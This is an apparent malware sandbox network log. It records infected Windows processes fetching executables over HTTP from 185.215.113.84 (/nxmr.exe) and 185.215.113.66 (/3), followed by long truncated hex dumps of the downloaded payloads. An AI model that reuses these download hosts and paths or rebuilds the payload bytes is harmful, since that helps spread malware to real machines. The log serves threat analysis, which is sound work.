                                                                                                                                                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374416113 CET1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                                                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374459982 CET1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                                                                                                                                                  Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374541044 CET1236INData Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36
                                                                                                                                                                                                                                                  Data Ascii: sarI4ns;?E*;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4*Hft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374552965 CET1236INData Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2
                                                                                                                                                                                                                                                  Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4|bob`|bS
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374667883 CET1236INData Raw: b5 f2 e5 56 94 d5 a7 ba 2e 4b ef 19 cb 34 b8 a7 99 e1 80 8c cc c0 91 a1 56 e3 29 95 04 e6 0f b9 a5 86 93 81 fe fb 19 09 f6 66 dc 6a 30 a9 58 e4 78 2d 5f 4e 45 b3 14 af 02 96 da 20 60 39 3e 4b 48 c0 80 cb 76 02 0b 8c c1 87 09 1a bc 98 6d 65 18 af
                                                                                                                                                                                                                                                  Data Ascii: V.K4V)fj0Xx-_NE `9>KHvme#R]/I{J4],GCrJZ3;:U$=%W&^/UR1i [kkRh1;Cz^DO"j$qQT`r!Q[(7_`E
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374680042 CET1236INData Raw: 28 11 af e2 41 9b fa 51 e9 ab d8 2a 79 da ce 15 40 37 b8 70 18 de 0f 5b 95 e6 1e b5 38 1d 61 99 66 96 eb c4 00 1f 65 72 58 fc 2e 42 79 8e 29 b8 e0 15 7b 9e 33 1a 0b 8c e5 49 8f 3e 92 cc 6d 67 59 91 10 68 27 3e 93 f3 d5 fa 1d e9 90 99 e6 46 67 f1
                                                                                                                                                                                                                                                  Data Ascii: (AQ*y@7p[8aferX.By){3I>mgYh'>Fg),},([vUl s?u/AsGbrRbV1oLE?fpK`|cv\}0>jmer^kvrM5uMW~c3FzWSkUM@q
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374692917 CET873INData Raw: b7 1b ed 55 22 52 87 a3 c5 38 9f b8 98 95 ff b4 f2 c4 e9 dd 2d 0b 3c 5d 3d 5e 30 5e fd c6 f8 54 b4 2a e8 93 3d a8 1f 7d 5c e5 4d 1d c9 7e cb 06 5c 4c 2c 00 33 bd 10 e0 11 48 3b 01 7b 52 15 1a d2 67 2c a4 26 fc e8 3f 86 7e 08 4f 27 64 b0 a6 1b 25
                                                                                                                                                                                                                                                  Data Ascii: U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd%`dJU]~Y:|2Jd-\ Q@n\|{hYc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gd
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.503911018 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.945839882 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:12 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.945900917 CET1236INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:12.949743986 CET1236INData Raw: 21 40 2e 7a e6 15 b0 99 e8 de ee 46 43 de 03 52 a6 24 16 2a b3 5d d1 a1 7f a1 78 24 78 cf 01 39 d9 7c 1d f8 bc 81 03 92 ba 67 09 de e8 5d f4 fa 51 0c a3 36 e6 93 c9 a6 8d b5 2b 22 59 9a f8 e5 f7 e7 93 69 b0 54 20 09 4a 3a 9e ac 16 cc 15 f9 31 da
                                                                                                                                                                                                                                                  Data Ascii: !@.zFCR$*]x$x9|g]Q6+"YiT J:1kYK`coIIe=v)~::N({6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<pt


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.1149793185.215.113.84808160C:\Users\user\AppData\Local\Temp\78476062.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:11.855722904 CET177OUTGET /nxmr.exe HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190130949 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:12 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 5827584
                                                                                                                                                                                                                                                  Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "66f70fa2-58ec00"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.&X@pYY` Y4PYXX`Y0X("YP.textP``.dataVV@.rdata9X:xX@@.pdataXXX@@.xdataXX@@.bssY.idata4 YX@.CRT`0YX@.tls@YX@.rsrcPYX@.reloc0`YX@B
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190151930 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 75 b1
                                                                                                                                                                                                                                                  Data Ascii: Df.H(HuX1HvXHyXHXf8MZuHcP<H8PEtfHXXuCqTkHXTkHXdHmX8tI1H(p
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190162897 CET1236INData Raw: fd ff ff 89 c1 e8 2b 6d 01 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 c5 ac 58 00 c7 00 01 00 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 a5 ac 58 00 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3
                                                                                                                                                                                                                                                  Data Ascii: +mf.H(HXH(H(HXH(H(lHH(H@HIXHP!HH9uHXHPfHH9uHXHPfHH9uH}XHPfH
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190303087 CET1236INData Raw: d6 4c 89 c5 4d 89 cc 48 8d 7c 24 20 41 b8 08 02 00 00 ba 00 00 00 00 48 89 f9 e8 9a 68 01 00 4d 89 e0 48 89 ea 48 89 f9 e8 34 28 00 00 89 f2 48 89 d9 e8 35 fe ff ff 41 89 f0 48 89 da 48 89 f9 e8 c8 35 00 00 90 48 81 c4 30 02 00 00 5b 5e 5f 5d 41
                                                                                                                                                                                                                                                  Data Ascii: LMH|$ AHhMHH4(H5AHH5H0[^_]A\UWVSHH)H$8H$8A6>HH@ HH$0Agf$Pf$R f$Tf$Vf$Xf$Z
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190315008 CET1236INData Raw: 7c 01 00 00 67 00 66 c7 84 24 7e 01 00 00 93 00 66 c7 84 24 80 01 00 00 a7 00 66 c7 84 24 82 01 00 00 a6 00 66 c7 84 24 84 01 00 00 ae 00 66 c7 84 24 86 01 00 00 9c 00 66 c7 84 24 88 01 00 00 a9 00 66 c7 84 24 8a 01 00 00 aa 00 66 c7 84 24 8c 01
                                                                                                                                                                                                                                                  Data Ascii: |gf$~f$f$f$f$f$f$f$f$f$f$f$ef$f$f$f$7=Xu<XHXDPfAHH'unXHm=Xt
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190325975 CET1236INData Raw: 01 00 00 1a 00 66 c7 84 24 54 01 00 00 36 00 66 c7 84 24 56 01 00 00 30 00 66 c7 84 24 58 01 00 00 3f 00 66 c7 84 24 5a 01 00 00 3c 00 66 c7 84 24 5c 01 00 00 40 00 66 c7 84 24 5e 01 00 00 3c 00 66 c7 84 24 60 01 00 00 33 00 66 c7 84 24 62 01 00
                                                                                                                                                                                                                                                  Data Ascii: f$T6f$V0f$X?f$Z<f$\@f$^<f$`3f$bAf$df$f$f$h6f$j;f$l1f$n<f$pDf$r@f$tf$v f$x2f$z0f$|Bf$~?f$6f$
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190339088 CET1236INData Raw: c7 84 24 6a 01 00 00 e0 00 66 c7 84 24 6c 01 00 00 de 00 66 c7 84 24 6e 01 00 00 ef 00 66 c7 84 24 70 01 00 00 ee 00 66 c7 84 24 72 01 00 00 d7 00 66 c7 84 24 74 01 00 00 df 00 66 c7 84 24 76 01 00 00 f5 00 66 c7 84 24 78 01 00 00 e0 00 66 c7 84
                                                                                                                                                                                                                                                  Data Ascii: $jf$lf$nf$pf$rf$tf$vf$xf$zf$|f$~f$f$f$f$f$f${==Xu<xXH0XDPfAHHuXH=<X
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190501928 CET1236INData Raw: 0f b7 02 66 2d dd 0c 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 7b d7 58 00 00 66 c7 84 24 50 01 00 00 39 00 66 c7 84 24 52 01 00 00 1f 00 66 c7 84 24 54 01 00 00 3e 00 66 c7 84 24 56 01 00 00 50 00 66 c7 84 24 58 01 00 00 42 00 66 c7
                                                                                                                                                                                                                                                  Data Ascii: f-f%fHH9u{Xf$P9f$Rf$T>f$VPf$XBf$Z+f$\>f$^Jf$`Bf$bAf$d,f$f?f$hGf$jBf$l@f$nQf$pPf$r9f$tSf$vIf$xGf
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190514088 CET1224INData Raw: d5 58 00 48 8d 4a 12 0f b7 02 66 2d 8d 7a 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 2a d5 58 00 00 48 8d 94 24 20 14 00 00 48 8d 8c 24 50 01 00 00 4c 8d 05 01 d5 58 00 e8 fc 0f 00 00 48 8d 7c 24 60 48 8d 35 c0 65 58 00 b9 e2 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: XHJf-zf%fHH9u*XH$ H$PLXH|$`H5eX=Xu9XHXTD`fAHHquXH,=Xt,HXHf}f%fHH9udXL$PH$ H$Ht$(LD$ LYX
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.190526009 CET1236INData Raw: 05 40 cf 58 00 e8 6b 0b 00 00 66 c7 44 24 60 76 00 66 c7 44 24 62 a4 00 66 c7 44 24 64 71 00 66 c7 44 24 66 80 00 66 c7 44 24 68 c3 00 66 c7 44 24 6a c6 00 66 c7 44 24 6c bf 00 66 c7 44 24 6e 71 00 66 c7 44 24 70 80 00 66 c7 44 24 72 c5 00 66 c7
                                                                                                                                                                                                                                                  Data Ascii: @XkfD$`vfD$bfD$dqfD$ffD$hfD$jfD$lfD$nqfD$pfD$rfD$tfD$vqfD$xsfD$zfD$|fD$~f$f$f$f$f$f$f$qf$f$f$f$f$f
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.310086012 CET1236INData Raw: 8d 7a 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 92 d3 58 00 00 48 8d 0d 71 d3 58 00 e8 24 47 01 00 01 c0 66 89 84 24 50 04 00 00 66 c7 44 24 40 dd 00 66 c7 44 24 42 ff 00 66 c7 44 24 44 fc 00 66 c7 44 24 46 03 00 66 c7 44 24 48 f6 00
                                                                                                                                                                                                                                                  Data Ascii: zf%fHH9uXHqX$Gf$PfD$@fD$BfD$DfD$FfD$HfD$JfD$LfD$NfD$PfD$RfD$TfD$VfD$X=Xu9XHXTD@fAHHuXH=Xt)HXHJf-zf%fHH


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.1149800185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.583940029 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.415510893 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:15 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.415572882 CET124INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.417004108 CET1236INData Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a
                                                                                                                                                                                                                                                  Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|Sz#0#|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.417016029 CET1236INData Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e
                                                                                                                                                                                                                                                  Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.417043924 CET248INData Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc
                                                                                                                                                                                                                                                  Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.419214010 CET1236INData Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e
                                                                                                                                                                                                                                                  Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.419224977 CET1236INData Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1
                                                                                                                                                                                                                                                  Data Ascii: f3w|R!hX~beb|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.419236898 CET248INData Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c
                                                                                                                                                                                                                                                  Data Ascii: S#2j1!DR<_'U*ruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-d*CZ`p7(uiHd=)d3@<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.421212912 CET1236INData Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2
                                                                                                                                                                                                                                                  Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.421241045 CET1236INData Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f
